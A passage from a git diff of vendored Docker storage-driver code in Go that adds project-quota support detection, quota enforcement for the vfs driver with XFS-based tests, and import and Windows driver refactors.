Q_XGETPQUOTA #define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, PRJQUOTA) #endif + +const int Q_XGETQSTAT_PRJQUOTA = QCMD(Q_XGETQSTAT, PRJQUOTA); */ import "C" import ( "fmt" "io/ioutil" - "os" "path" "path/filepath" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" + rsystem "github.com/opencontainers/runc/libcontainer/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // Quota limit params - currently we only control blocks hard limit @@ -98,13 +100,12 @@ type Control struct { // func NewControl(basePath string) (*Control, error) { // - // Get project id of parent 
dir as minimal id to be used by driver + // If we are running in a user namespace quota won't be supported for + // now since makeBackingFsDev() will try to mknod(). // - minProjectID, err := getProjectID(basePath) - if err != nil { - return nil, err + if rsystem.RunningInUserNS() { + return nil, ErrQuotaNotSupported } - minProjectID++ // // create backing filesystem device node @@ -114,6 +115,25 @@ func NewControl(basePath string) (*Control, error) { return nil, err } + // check if we can call quotactl with project quotas + // as a mechanism to determine (early) if we have support + hasQuotaSupport, err := hasQuotaSupport(backingFsBlockDev) + if err != nil { + return nil, err + } + if !hasQuotaSupport { + return nil, ErrQuotaNotSupported + } + + // + // Get project id of parent dir as minimal id to be used by driver + // + minProjectID, err := getProjectID(basePath) + if err != nil { + return nil, err + } + minProjectID++ + // // Test if filesystem supports project quotas by trying to set // a quota on the first available project id @@ -184,7 +204,7 @@ func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) er var cs = C.CString(backingFsBlockDev) defer C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM, + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XSETPQLIM, uintptr(unsafe.Pointer(cs)), uintptr(d.d_id), uintptr(unsafe.Pointer(&d)), 0, 0) if errno != 0 { @@ -211,7 +231,7 @@ func (q *Control) GetQuota(targetPath string, quota *Quota) error { var cs = C.CString(q.backingFsBlockDev) defer C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA, + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, C.Q_XGETPQUOTA, uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)), uintptr(unsafe.Pointer(&d)), 0, 0) if errno != 0 { @@ -232,7 +252,7 @@ func getProjectID(targetPath string) (uint32, error) { defer closeDir(dir) var fsx C.struct_fsxattr - _, _, errno := 
syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) @@ -250,14 +270,14 @@ func setProjectID(targetPath string, projectID uint32) error { defer closeDir(dir) var fsx C.struct_fsxattr - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) } fsx.fsx_projid = C.__u32(projectID) fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT - _, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, + _, _, errno = unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, uintptr(unsafe.Pointer(&fsx))) if errno != 0 { return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error()) @@ -322,18 +342,43 @@ func getDirFd(dir *C.DIR) uintptr { // and create a block device node under the home directory // to be used by quotactl commands func makeBackingFsDev(home string) (string, error) { - fileinfo, err := os.Stat(home) - if err != nil { + var stat unix.Stat_t + if err := unix.Stat(home, &stat); err != nil { return "", err } backingFsBlockDev := path.Join(home, "backingFsBlockDev") - // Re-create just in case comeone copied the home directory over to a new device - syscall.Unlink(backingFsBlockDev) - stat := fileinfo.Sys().(*syscall.Stat_t) - if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil { + // Re-create just in case someone copied the home directory over to a new device + unix.Unlink(backingFsBlockDev) + err := unix.Mknod(backingFsBlockDev, unix.S_IFBLK|0600, int(stat.Dev)) + switch err { + case nil: + return backingFsBlockDev, nil + + 
case unix.ENOSYS: + return "", ErrQuotaNotSupported + + default: return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err) } +} + +func hasQuotaSupport(backingFsBlockDev string) (bool, error) { + var cs = C.CString(backingFsBlockDev) + defer free(cs) + var qstat C.fs_quota_stat_t + + _, _, errno := unix.Syscall6(unix.SYS_QUOTACTL, uintptr(C.Q_XGETQSTAT_PRJQUOTA), uintptr(unsafe.Pointer(cs)), 0, uintptr(unsafe.Pointer(&qstat)), 0, 0) + if errno == 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ENFD > 0 && qstat.qs_flags&C.FS_QUOTA_PDQ_ACCT > 0 { + return true, nil + } + + switch errno { + // These are the known fatal errors, consider all other errors (ENOTTY, etc.. not supporting quota) + case unix.EFAULT, unix.ENOENT, unix.ENOTBLK, unix.EPERM: + default: + return false, nil + } - return backingFsBlockDev, nil + return false, errno } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go new file mode 100644 index 0000000000..aa164cc419 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go @@ -0,0 +1,152 @@ +// +build linux + +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" + +import ( + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +// 10MB +const testQuotaSize = 10 * 1024 * 1024 +const imageSize = 64 * 1024 * 1024 + +func TestBlockDev(t *testing.T) { + mkfs, err := exec.LookPath("mkfs.xfs") + if err != nil { + t.Skip("mkfs.xfs not found in PATH") + } + + // create a sparse image + imageFile, err := ioutil.TempFile("", "xfs-image") + if err != nil { + t.Fatal(err) + } + imageFileName := imageFile.Name() + defer os.Remove(imageFileName) + if _, err = imageFile.Seek(imageSize-1, 0); err != nil { + t.Fatal(err) + } + if _, err = 
imageFile.Write([]byte{0}); err != nil { + t.Fatal(err) + } + if err = imageFile.Close(); err != nil { + t.Fatal(err) + } + + // The reason for disabling these options is sometimes people run with a newer userspace + // than kernelspace + out, err := exec.Command(mkfs, "-m", "crc=0,finobt=0", imageFileName).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Fatal(err) + } + + t.Run("testBlockDevQuotaDisabled", wrapMountTest(imageFileName, false, testBlockDevQuotaDisabled)) + t.Run("testBlockDevQuotaEnabled", wrapMountTest(imageFileName, true, testBlockDevQuotaEnabled)) + t.Run("testSmallerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testSmallerThanQuota))) + t.Run("testBiggerThanQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testBiggerThanQuota))) + t.Run("testRetrieveQuota", wrapMountTest(imageFileName, true, wrapQuotaTest(testRetrieveQuota))) +} + +func wrapMountTest(imageFileName string, enableQuota bool, testFunc func(t *testing.T, mountPoint, backingFsDev string)) func(*testing.T) { + return func(t *testing.T) { + mountOptions := "loop" + + if enableQuota { + mountOptions = mountOptions + ",prjquota" + } + + mountPointDir := fs.NewDir(t, "xfs-mountPoint") + defer mountPointDir.Remove() + mountPoint := mountPointDir.Path() + + out, err := exec.Command("mount", "-o", mountOptions, imageFileName, mountPoint).CombinedOutput() + if err != nil { + _, err := os.Stat("/proc/fs/xfs") + if os.IsNotExist(err) { + t.Skip("no /proc/fs/xfs") + } + } + + assert.NilError(t, err, "mount failed: %s", out) + + defer func() { + assert.NilError(t, unix.Unmount(mountPoint, 0)) + }() + + backingFsDev, err := makeBackingFsDev(mountPoint) + assert.NilError(t, err) + + testFunc(t, mountPoint, backingFsDev) + } +} + +func testBlockDevQuotaDisabled(t *testing.T, mountPoint, backingFsDev string) { + hasSupport, err := hasQuotaSupport(backingFsDev) + assert.NilError(t, err) + assert.Check(t, !hasSupport) +} + +func 
testBlockDevQuotaEnabled(t *testing.T, mountPoint, backingFsDev string) { + hasSupport, err := hasQuotaSupport(backingFsDev) + assert.NilError(t, err) + assert.Check(t, hasSupport) +} + +func wrapQuotaTest(testFunc func(t *testing.T, ctrl *Control, mountPoint, testDir, testSubDir string)) func(t *testing.T, mountPoint, backingFsDev string) { + return func(t *testing.T, mountPoint, backingFsDev string) { + testDir, err := ioutil.TempDir(mountPoint, "per-test") + assert.NilError(t, err) + defer os.RemoveAll(testDir) + + ctrl, err := NewControl(testDir) + assert.NilError(t, err) + + testSubDir, err := ioutil.TempDir(testDir, "quota-test") + assert.NilError(t, err) + testFunc(t, ctrl, mountPoint, testDir, testSubDir) + } + +} + +func testSmallerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + smallerThanQuotaFile := filepath.Join(testSubDir, "smaller-than-quota") + assert.NilError(t, ioutil.WriteFile(smallerThanQuotaFile, make([]byte, testQuotaSize/2), 0644)) + assert.NilError(t, os.Remove(smallerThanQuotaFile)) +} + +func testBiggerThanQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + // Make sure the quota is being enforced + // TODO: When we implement this under EXT4, we need to shed CAP_SYS_RESOURCE, otherwise + // we're able to violate quota without issue + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + + biggerThanQuotaFile := filepath.Join(testSubDir, "bigger-than-quota") + err := ioutil.WriteFile(biggerThanQuotaFile, make([]byte, testQuotaSize+1), 0644) + assert.Assert(t, is.ErrorContains(err, "")) + if err == io.ErrShortWrite { + assert.NilError(t, os.Remove(biggerThanQuotaFile)) + } +} + +func testRetrieveQuota(t *testing.T, ctrl *Control, homeDir, testDir, testSubDir string) { + // Validate that we can retrieve quota + assert.NilError(t, ctrl.SetQuota(testSubDir, Quota{testQuotaSize})) + + var q Quota + 
assert.NilError(t, ctrl.GetQuota(testSubDir, &q)) + assert.Check(t, is.Equal(uint64(testQuotaSize), q.Size)) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go index 262954d6e3..ec18d1d377 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go @@ -1,6 +1,6 @@ // +build !exclude_graphdriver_aufs,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the aufs graphdriver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go index f456cc5ce5..2f8c67056b 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go @@ -1,6 +1,6 @@ // +build !exclude_graphdriver_btrfs,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the btrfs graphdriver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go index bb2e9ef541..ccbb8bfabe 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go @@ -1,6 +1,6 @@ -// +build !exclude_graphdriver_devicemapper,linux +// +build !exclude_graphdriver_devicemapper,!static_build,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the devmapper graphdriver diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go index 9ba849cedc..a2e384d548 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go @@ -1,9 +1,8 @@ // +build !exclude_graphdriver_overlay,linux -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the overlay graphdriver _ "github.com/docker/docker/daemon/graphdriver/overlay" - _ "github.com/docker/docker/daemon/graphdriver/overlay2" ) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go new file mode 100644 index 0000000000..bcd2cee20e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_overlay2,linux + +package register // import "github.com/docker/docker/daemon/graphdriver/register" + +import ( + // register the overlay2 graphdriver + _ "github.com/docker/docker/daemon/graphdriver/overlay2" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go index 98fad23b20..26f33a21ba 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go @@ -1,4 +1,4 @@ -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register vfs diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go index efaa5005ed..cd612cbea9 
100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go @@ -1,6 +1,7 @@ -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( - // register the windows graph driver + // register the windows graph drivers + _ "github.com/docker/docker/daemon/graphdriver/lcow" _ "github.com/docker/docker/daemon/graphdriver/windows" ) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go index 8f34e35537..b137ad25b7 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go @@ -1,6 +1,6 @@ -// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris +// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd -package register +package register // import "github.com/docker/docker/daemon/graphdriver/register" import ( // register the zfs driver diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go new file mode 100644 index 0000000000..7276b3837f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go @@ -0,0 +1,7 @@ +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import "github.com/docker/docker/daemon/graphdriver/copy" + +func dirCopy(srcDir, dstDir string) error { + return copy.DirCopy(srcDir, dstDir, copy.Content, false) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go new file mode 100644 index 0000000000..894ff02f02 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go @@ -0,0 +1,9 @@ +// +build !linux + +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import "github.com/docker/docker/pkg/chrootarchive" + +func dirCopy(srcDir, dstDir string) error { + return chrootarchive.NewArchiver(nil).CopyWithTar(srcDir, dstDir) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go index 8832d11531..e51cb6c250 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go @@ -1,4 +1,4 @@ -package vfs +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" import ( "fmt" @@ -6,15 +6,17 @@ import ( "path/filepath" "github.com/docker/docker/daemon/graphdriver" - "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/system" + "github.com/docker/go-units" + "github.com/opencontainers/selinux/go-selinux/label" ) var ( - // CopyWithTar defines the copy method to use. - CopyWithTar = chrootarchive.CopyWithTar + // CopyDir defines the copy method to use. + CopyDir = dirCopy ) func init() { @@ -25,17 +27,16 @@ func init() { // This sets the home directory for the driver and returns NaiveDiffDriver. 
func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { d := &Driver{ - home: home, - uidMaps: uidMaps, - gidMaps: gidMaps, - } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return nil, err + home: home, + idMappings: idtools.NewIDMappingsFromMaps(uidMaps, gidMaps), } - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + rootIDs := d.idMappings.RootPair() + if err := idtools.MkdirAllAndChown(home, 0700, rootIDs); err != nil { return nil, err } + + setupDriverQuota(d) + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil } @@ -44,9 +45,9 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap // In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support. // Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver type Driver struct { - home string - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap + driverQuota + home string + idMappings *idtools.IDMappings } func (d *Driver) String() string { @@ -71,26 +72,53 @@ func (d *Driver) Cleanup() error { // CreateReadWrite creates a layer that is writable for use as a container // file system. func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { - return d.Create(id, parent, opts) + var err error + var size int64 + + if opts != nil { + for key, val := range opts.StorageOpt { + switch key { + case "size": + if !d.quotaSupported() { + return quota.ErrQuotaNotSupported + } + if size, err = units.RAMInBytes(val); err != nil { + return err + } + default: + return fmt.Errorf("Storage opt %s not supported", key) + } + } + } + + return d.create(id, parent, uint64(size)) } // Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent. 
func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if opts != nil && len(opts.StorageOpt) != 0 { - return fmt.Errorf("--storage-opt is not supported for vfs") + return fmt.Errorf("--storage-opt is not supported for vfs on read-only layers") } + return d.create(id, parent, 0) +} + +func (d *Driver) create(id, parent string, size uint64) error { dir := d.dir(id) - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { + rootIDs := d.idMappings.RootPair() + if err := idtools.MkdirAllAndChown(filepath.Dir(dir), 0700, rootIDs); err != nil { return err } - if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0755, rootIDs); err != nil { return err } - if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil { - return err + + if size != 0 { + if err := d.setupQuota(dir, size); err != nil { + return err + } } + labelOpts := []string{"level:s0"} if _, mountLabel, err := label.InitLabels(labelOpts); err == nil { label.SetFileLabel(dir, mountLabel) @@ -102,10 +130,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if err != nil { return fmt.Errorf("%s: %s", parent, err) } - if err := CopyWithTar(parentDir, dir); err != nil { - return err - } - return nil + return CopyDir(parentDir.Path(), dir) } func (d *Driver) dir(id string) string { @@ -114,21 +139,18 @@ func (d *Driver) dir(id string) string { // Remove deletes the content from the directory for a given id. func (d *Driver) Remove(id string) error { - if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { - return err - } - return nil + return system.EnsureRemoveAll(d.dir(id)) } // Get returns the directory for the given id. 
-func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { dir := d.dir(id) if st, err := os.Stat(dir); err != nil { - return "", err + return nil, err } else if !st.IsDir() { - return "", fmt.Errorf("%s: not a directory", dir) + return nil, fmt.Errorf("%s: not a directory", dir) } - return dir, nil + return containerfs.NewLocalContainerFS(dir), nil } // Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go new file mode 100644 index 0000000000..0d5c3a7b98 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go @@ -0,0 +1,26 @@ +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import ( + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/sirupsen/logrus" +) + +type driverQuota struct { + quotaCtl *quota.Control +} + +func setupDriverQuota(driver *Driver) { + if quotaCtl, err := quota.NewControl(driver.home); err == nil { + driver.quotaCtl = quotaCtl + } else if err != quota.ErrQuotaNotSupported { + logrus.Warnf("Unable to setup quota: %v\n", err) + } +} + +func (d *Driver) setupQuota(dir string, size uint64) error { + return d.quotaCtl.SetQuota(dir, quota.Quota{Size: size}) +} + +func (d *Driver) quotaSupported() bool { + return d.quotaCtl != nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go new file mode 100644 index 0000000000..3ae60ac07c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go @@ -0,0 +1,20 @@ +// +build !linux + +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" + +import 
"github.com/docker/docker/daemon/graphdriver/quota" + +type driverQuota struct { +} + +func setupDriverQuota(driver *Driver) error { + return nil +} + +func (d *Driver) setupQuota(dir string, size uint64) error { + return quota.ErrQuotaNotSupported +} + +func (d *Driver) quotaSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go index 9ecf21dbaa..7c59ec32e2 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go @@ -1,6 +1,6 @@ // +build linux -package vfs +package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs" import ( "testing" @@ -32,6 +32,10 @@ func TestVfsCreateSnap(t *testing.T) { graphtest.DriverTestCreateSnap(t, "vfs") } +func TestVfsSetQuota(t *testing.T) { + graphtest.DriverTestSetQuota(t, "vfs", false) +} + func TestVfsTeardown(t *testing.T) { graphtest.PutDriver(t) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go index beac93ae75..16a5229206 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go @@ -1,6 +1,6 @@ //+build windows -package windows +package windows // import "github.com/docker/docker/daemon/graphdriver/windows" import ( "bufio" @@ -24,14 +24,16 @@ import ( "github.com/Microsoft/go-winio/archive/tar" "github.com/Microsoft/go-winio/backuptar" "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/longpath" "github.com/docker/docker/pkg/reexec" + 
"github.com/docker/docker/pkg/system" units "github.com/docker/go-units" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" ) @@ -93,6 +95,10 @@ func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home) } + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("windowsfilter failed to create '%s': %v", home, err) + } + d := &Driver{ info: hcsshim.DriverInfo{ HomeDir: home, @@ -119,7 +125,7 @@ func getFileSystemType(drive string) (fsType string, hr error) { modkernel32 = windows.NewLazySystemDLL("kernel32.dll") procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW") buf = make([]uint16, 255) - size = syscall.MAX_PATH + 1 + size = windows.MAX_PATH + 1 ) if len(drive) != 1 { hr = errors.New("getFileSystemType must be called with a drive letter") @@ -127,11 +133,11 @@ func getFileSystemType(drive string) (fsType string, hr error) { } drive += `:\` n := uintptr(unsafe.Pointer(nil)) - r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) + r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) if int32(r0) < 0 { hr = syscall.Errno(win32FromHresult(r0)) } - fsType = syscall.UTF16ToString(buf) + fsType = windows.UTF16ToString(buf) return } @@ -265,19 +271,35 @@ func (d *Driver) Remove(id string) error { // it is a transient error. Retry until it succeeds. var computeSystems []hcsshim.ContainerProperties retryCount := 0 + osv := system.GetOSVersion() for { - // Get and terminate any template VMs that are currently using the layer + // Get and terminate any template VMs that are currently using the layer. 
+ // Note: It is unfortunate that we end up in the graphdrivers Remove() call + // for both containers and images, but the logic for template VMs is only + // needed for images - specifically we are looking to see if a base layer + // is in use by a template VM as a result of having started a Hyper-V + // container at some point. + // + // We have a retry loop for ErrVmcomputeOperationInvalidState and + // ErrVmcomputeOperationAccessIsDenied as there is a race condition + // in RS1 and RS2 building during enumeration when a silo is going away + // for example under it, in HCS. AccessIsDenied added to fix 30278. + // + // TODO @jhowardmsft - For RS3, we can remove the retries. Also consider + // using platform APIs (if available) to get this more succinctly. Also + // consider enhancing the Remove() interface to have context of why + // the remove is being called - that could improve efficiency by not + // enumerating compute systems during a remove of a container as it's + // not required. computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{}) if err != nil { - if err == hcsshim.ErrVmcomputeOperationInvalidState { - if retryCount >= 5 { - // If we are unable to get the list of containers - // go ahead and attempt to delete the layer anyway - // as it will most likely work. + if (osv.Build < 15139) && + ((err == hcsshim.ErrVmcomputeOperationInvalidState) || (err == hcsshim.ErrVmcomputeOperationAccessIsDenied)) { + if retryCount >= 500 { break } retryCount++ - time.Sleep(2 * time.Second) + time.Sleep(10 * time.Millisecond) continue } return err @@ -318,45 +340,53 @@ func (d *Driver) Remove(id string) error { return nil } +// GetLayerPath gets the layer path on host +func (d *Driver) GetLayerPath(id string) (string, error) { + return d.dir(id), nil +} + // Get returns the rootfs path for the id. This will mount the dir at its given path. 
-func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel) var dir string rID, err := d.resolveID(id) if err != nil { - return "", err + return nil, err } if count := d.ctr.Increment(rID); count > 1 { - return d.cache[rID], nil + return containerfs.NewLocalContainerFS(d.cache[rID]), nil } // Getting the layer paths must be done outside of the lock. layerChain, err := d.getLayerChain(rID) if err != nil { d.ctr.Decrement(rID) - return "", err + return nil, err } if err := hcsshim.ActivateLayer(d.info, rID); err != nil { d.ctr.Decrement(rID) - return "", err + return nil, err } if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { d.ctr.Decrement(rID) if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { logrus.Warnf("Failed to Deactivate %s: %s", id, err) } - return "", err + return nil, err } mountPath, err := hcsshim.GetLayerMountPath(d.info, rID) if err != nil { d.ctr.Decrement(rID) + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + logrus.Warnf("Failed to Unprepare %s: %s", id, err) + } if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { logrus.Warnf("Failed to Deactivate %s: %s", id, err) } - return "", err + return nil, err } d.cacheMu.Lock() d.cache[rID] = mountPath @@ -370,7 +400,7 @@ func (d *Driver) Get(id, mountLabel string) (string, error) { dir = d.dir(id) } - return dir, nil + return containerfs.NewLocalContainerFS(dir), nil } // Put adds a new layer to the driver. 
